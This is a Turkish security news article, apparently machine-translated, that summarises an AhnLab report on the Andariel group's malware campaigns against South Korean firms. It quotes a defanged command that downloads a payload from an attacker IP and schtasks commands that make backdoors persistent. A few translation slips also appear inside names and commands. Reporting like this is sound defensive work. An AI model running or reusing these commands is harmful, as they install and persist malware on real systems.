Andariel grubunun son raporlarda varlık yönetimi programları aracılığıyla kötü amaçlı yazılım dağıttığı belirlendi. Bu grubun daha önce Lazarus grubuyla ilişki içinde olduğu keşfedilmişti.
Andariel grubunun, ilk erişimlerinin bir parçası olarak tedarik zinciri, hedef odaklı kimlik avı veya sulama deliği saldırıları başlattığı biliniyor.
Grubun son hedefleri, Güney Kore’deki çeşitli kurumsal sektörlere saldırmak amacıyla hedeflenen Log4Shell ve Innorix ajanlarıydı. Başka bir durumda, MS-SQL sunucusunun da kötü amaçlı yazılım saldırısına hedef olduğu belirlendi.
Saldırılar için kullanılan kötü amaçlı yazılımlar arasında TigerRAT, NukeSped çeşitleri, Black RAT ve Lilith RAT yer alıyor. Önceki saldırılara benzer şekilde öncelikli hedefleri Güney Koreli iletişim şirketleri ve yarı iletken üreticileriydi.
Yaklaşan web seminerinde CTO Karthik Krishnamoorthy ve Indusface Ürün Başkan Yardımcısı Vivek Gopalan, API’lerin nasıl saldırıya uğrayabileceğini gösteriyor. Oturumda şunlar ele alınacak: OWASP API’nin en iyi 10 güvenlik açığından yararlanma, API’ye kaba kuvvetle hesap ele geçirme (ATO) saldırısı, API’ye DDoS saldırısı, WAAP’ın API ağ geçidi üzerinden güvenliği nasıl artırabileceği
Ücretsiz Kayıt Ol
Bilgisayar Korsanları Varlık Yönetimi Programından Yararlanıyor
İlk Erişim
Bir vakada, çeşitli kayıtlarla tanımlanan bir varlık yönetimi programı hedef alındı.
Bu program, mshta.exe işlemini kullanarak kötü amaçlı yazılımı indirmek için aşağıdaki PowerShell komutunu kullanan Andariel grubunun kötü amaçlı yazılımıyla birlikte yüklendi.
PowerShell komutu: wgethxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe
Saldırılarda Kullanılan Kötü Amaçlı Yazılım
En çok kullanılan arka kapılardan bazıları TigerRAT, Black RAT ve NukeSped’di.
Ancak son saldırılarda Lilith RAT adlı açık kaynaklı bir kötü amaçlı yazılım kullanıldı. Diğer durumlarda Go dilinde geliştirilen kötü amaçlı yazılımlar da keşfedildi.
KaplanRAT
Bu kötü amaçlı yazılım, dosya yükleme ve indirme, komutları yürütme, temel bilgileri toplama, tuş kaydetme, ekran görüntüsü alma ve bağlantı noktası iletme gibi çeşitli özellikleri destekler.
Bu arka kapının, ilk iletişimler sırasında bir kimlik doğrulama süreci vardır, bu da onu diğer arka kapılardan farklı kılar.
Golang İndirici
Bu kötü amaçlı yazılım, C&C sunucusuna bağlanan ve ek bir veri yükü yükleyen basit bir yapı içerir.
Ayrıca C2 sunucusuyla iletişimi sırasında Base64 şifrelemesini kullandı. Bu Golang indiricisi, TigerRAT ve NukeSped çeşitleri gibi kötü amaçlı yazılımları indirmek ve yüklemek için kullanılır.
NukeSped Çeşitleri, Siyah RAT ve Lilith RAT
NukeSped, C2 sunucusundan komutlar alan ve etkilenen sistemi kontrol eden bir arka kapıdır.
Bu arka kapı, C2 sunucusuyla ilk iletişim sırasında POST yöntemini kullanarak bir paket gönderir ve ayrıca yürütülen komutların sonuçlarını GET yöntemini kullanarak sunucuya gönderir.
Black RAT, Go Dilinde geliştirilen ve son saldırılarda kullanılan herhangi bir kaynak kod bilgisi içermeyen bir başka arka kapıdır.
Ancak Lilith RAT, C++ dilinde geliştirilen ve GitHub’da yayınlanan açık kaynaklı bir kötü amaçlı yazılımdı.
Uzaktan kod yürütme, kalıcılığı koruma ve otomatik silme işlemlerini gerçekleştirmek için kullanılabilecek çeşitli özelliklerden oluşur.
Enfeksiyon Sonrası
Arka kapılar sisteme yüklendikten sonra, kalıcılığı korumak amacıyla bunları görev zamanlayıcıya kaydetmek için aşağıdaki komutları yürütürler.
| > schtasks /delete /tn “microsoft\******” /f > schtasks /create /tn “microsoft\******” /tr “c:\users\%ASD%\credis.exe” /sc onlogon /ru sistemi > schtasks /run /tn “microsoft\windows\mui\route” |
Bunu yayınlayın; Etkilenen sistemdeki bilgileri aramak ve indirici kötü amaçlı yazılımı kaldırmak veya diğer işlemleri sonlandırmak için ek komutlar kullanılır.
Arka kapı aynı zamanda bilgi toplar ve bir tehdit aktörünün kimlik bilgilerini çalmak veya şifre kurtarmak için bilgisayar korsanlığı araçlarını indirip kullanmasına yönelik yetenekler sunar.
Bu tehdit aktörü ve kullanılan kötü amaçlı yazılım hakkında kaynak kodu, komutlar ve diğerleri hakkında ayrıntılı bilgi sağlayan eksiksiz bir rapor AhnLab tarafından yayınlandı.
14 günlük ücretsiz deneme sürümünü deneyerek StorageGuard’ın depolama sistemlerinizdeki güvenlik kör noktalarını nasıl ortadan kaldırdığını deneyimleyin.